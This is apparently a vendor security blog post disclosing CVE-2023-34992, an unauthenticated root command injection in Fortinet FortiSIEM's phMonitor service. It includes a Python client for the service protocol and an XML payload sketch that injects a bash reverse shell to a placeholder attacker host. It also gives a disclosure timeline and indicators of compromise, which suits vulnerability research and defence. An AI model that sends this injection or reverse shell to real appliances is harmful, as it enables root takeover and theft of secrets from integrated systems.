In early 2023, following some early success in auditing Fortinet appliances, I continued the effort and landed upon the Fortinet FortiSIEM. Several issues were discovered during this audit that ultimately led to unauthenticated remote code execution in the context of the root user. The vulnerabilities were assigned CVE-2023-34992 with a CVSS 3.0 score of 10.0, given that the access allowed reading secrets for integrated systems, enabling pivoting into those systems.
FortiSIEM Overview
FortiSIEM allows customers to perform many of the expected functions of a typical SIEM solution, such as log collection, correlation, automated response, and remediation. It also supports both simple and complex deployments, ranging from a standalone appliance to scaled-out solutions for enterprises and MSPs.
In a FortiSIEM deployment, there are four types of roles that a system can have:
● Supervisor – for smaller deployments this is all that’s needed; it also supervises the other roles
● Worker – handles all the data coming from Collectors in larger environments
● Collector – used to scale data collection from various geographically separated network environments, potentially behind firewalls
● Manager – can be used to monitor and manage multiple FortiSIEM instances
For the purposes of this research, I deployed an all-in-one architecture where the appliance contains all of the functionality within the Supervisor role. For more information about FortiSIEM key concepts refer to the documentation.
Exploring the System
One of the first things we do when auditing an appliance, given some type of shell access, is to inspect the listening services. Starting with the most obvious service, the web service, we see that it listens on tcp/443 and that the proxy configuration routes traffic to an internal service listening on tcp/8080.
Figure 2. httpd.conf proxying traffic
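The relevant portion of the configuration is a standard Apache reverse-proxy setup, roughly along these lines (a sketch only; the exact directives and paths in FortiSIEM's shipped httpd.conf are not reproduced verbatim here):

```
<VirtualHost *:443>
    SSLEngine on
    # Forward external HTTPS traffic to the backend application server on tcp/8080
    ProxyPass        / http://127.0.0.1:8080/
    ProxyPassReverse / http://127.0.0.1:8080/
</VirtualHost>
```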
We find that the backend web service is deployed via GlassFish, a Java framework similar to Tomcat in that it provides a simple way to deploy Java applications as WAR files. We find the WAR file that backs the service, unpack it, and decompile it. Inspecting some of the unauthenticated attack surface, we happen upon the LicenseUploadServlet.class.
Figure 4. LicenseUploadServlet doPost method
We follow the code into this.notify(), where we eventually observe it calling sendCommand(), which interestingly sends a custom binary message containing our input to tcp/7900.
We find that tcp/7900 hosts the phMonitor service, which listens on all interfaces, not just localhost.
Figure 6. phMonitor on tcp/7900
The phMonitor service itself is a compiled C++ binary.
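As a quick sanity check before building anything, we can confirm that the service completes a TLS handshake. A minimal sketch (the target address is a placeholder):

```python
import socket
import ssl

# Minimal check: does phMonitor on tcp/7900 accept a TLS connection?
# "TARGET" is a placeholder for the FortiSIEM appliance address.
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE  # we only care about the handshake, not the certificate

with socket.create_connection(("TARGET", 7900)) as raw:
    with ctx.wrap_socket(raw) as tls:
        print(tls.version())  # prints e.g. "TLSv1.2" if the handshake succeeds
```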
Building a Client
Now that we’ve identified an interesting attack surface, let’s build a client to interact with it in the same way the web service does. The message format is a simple combination of:
- Command Type – The integer enum mapped to specific function handlers inside the phMonitor service
- Payload Length – The length of the payload in the message
- Send ID – An arbitrary integer value passed in the message
- Sequence ID – The sequence number of this message
- Payload – The specific data the function handler within phMonitor will operate on
Constructing the LicenseUpload message in little-endian format and sending it over an SSL-wrapped socket succeeds in communicating with the service. Re-implementing the client messaging protocol in Python looks like the following:
Figure 7. phMonitor Python client
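A minimal sketch of such a client, assuming the field layout described above (the exact header widths, framing, and the send_command() helper name are assumptions here, not the code from Figure 7):

```python
import socket
import ssl
import struct

def send_command(host: str, cmd_type: int, payload: bytes,
                 send_id: int = 1, seq_id: int = 1, port: int = 7900) -> bytes:
    """Send a single phMonitor message and return whatever the service replies with."""
    # Little-endian header: command type, payload length, send ID, sequence ID,
    # followed by the raw payload. Field widths are assumed to be 4 bytes each.
    header = struct.pack("<IIII", cmd_type, len(payload), send_id, seq_id)

    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE  # skip certificate validation against the lab appliance

    with socket.create_connection((host, port)) as raw:
        with ctx.wrap_socket(raw) as tls:
            tls.sendall(header + payload)
            return tls.recv(4096)
```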
As a test that the client works, we send a command type of 29, mapped to handleProvisionServer, and can observe in the logs located at /opt/phoenix/log/phoenix.log that the message was delivered.
Figure 8. phMonitor client successful message sent
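With the hypothetical send_command() helper from the sketch above, that test amounts to something like:

```python
# Command type 29 maps to handleProvisionServer; any payload is enough to confirm
# delivery, which shows up in /opt/phoenix/log/phoenix.log on the appliance.
send_command("TARGET", 29, b"<test/>")
```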
phMonitor Internals
The phMonitor service marshals incoming requests to their appropriate function handlers based on the type of command sent in the API request. Each handler processes the sent payload data in its own way; some expect formatted strings, some expect XML.
Inside phMonitor, at the function phMonitorProcess::initEventHandler(), every command handler is mapped to an integer, which is passed in the command message. Security Issue #1 is that all of these handlers are exposed and available for any remote client to invoke without any authentication. There are several dozen handlers exposed in initEventHandler(), covering much of the administrative functionality of the appliance: getting and setting Collector passwords, getting and setting service passwords, initiating reverse SSH tunnels with remote collectors, and much more.
Figure 9. Sampling of handlers exposed
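Only two of those command types matter for the rest of this write-up; they are noted here as a small Python mapping for use with the earlier client sketch:

```python
# Command types confirmed during this research; initEventHandler() registers
# several dozen more handlers that are not listed here.
KNOWN_COMMANDS = {
    29: "handleProvisionServer",
    81: "handleStorageRequest",
}
```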
Finding a Bug
Given the vast amount of attack surface available unauthenticated within the phMonitor service, we begin with the easiest vulnerability classes. Tracing the calls between these handlers and calls to system(), we land on the handler handleStorageRequest(), mapped to command type 81. On line 201, the handler expects the payload to be XML data and parses it.
Figure 10. handleStorageRequest() expecting XML payload
Later, we see that it attempts to extract the server_ip and mount_point values from the XML payload.
Further down, on line 511, the handler formats a string with the parsed server_ip and mount_point values, which are user-controlled.
Figure 12. Format string with user-controlled data
Finally, on line 556, the handler calls do_system_cancellable(), a wrapper for system(), with the user-controlled command string.
Figure 13. do_system_cancellable command injection
Exploiting this issue is straightforward: we construct an XML payload that contains a malicious string to be interpreted, such as a reverse shell.
Figure 14. Reverse shell as root
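A sketch of what such a payload might look like, reusing the hypothetical send_command() helper from earlier (the element names server_ip and mount_point come from the handler; the surrounding XML structure and the exact injection primitive are assumptions, and the working payload is in our PoC):

```python
# Hypothetical payload sketch: inject a command through the mount_point value that
# handleStorageRequest() (command type 81) ultimately passes to do_system_cancellable().
# ATTACKER_IP / ATTACKER_PORT are placeholders for a listener under our control.
injected = "$(bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1')"
payload = (
    "<storage>"
    "<server_ip>127.0.0.1</server_ip>"
    f"<mount_point>{injected}</mount_point>"
    "</storage>"
).encode()

send_command("TARGET", 81, payload)
```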
Our proof of concept exploit can be found on our GitHub.
Indicators of Compromise
The logs in /opt/phoenix/logs/phoenix.logs verbosely log the contents of messages received by the phMonitor service. Below is an example log entry from exploiting the system:
Figure 15. phoenix.logs contain payload contents
Timeline
5 May 2023 – Initial report
10 October 2023 – Command injection vulnerability fixed
22 February 2024 – RingZer0 BOOTSTRAP conference talk disclosing some of these details
20 May 2024 – This blog
NodeZero
Horizon3.ai clients and free-trial users alike can run a NodeZero operation to determine the exposure and exploitability of this issue.
Sign up for a free trial and quickly verify you’re not exploitable.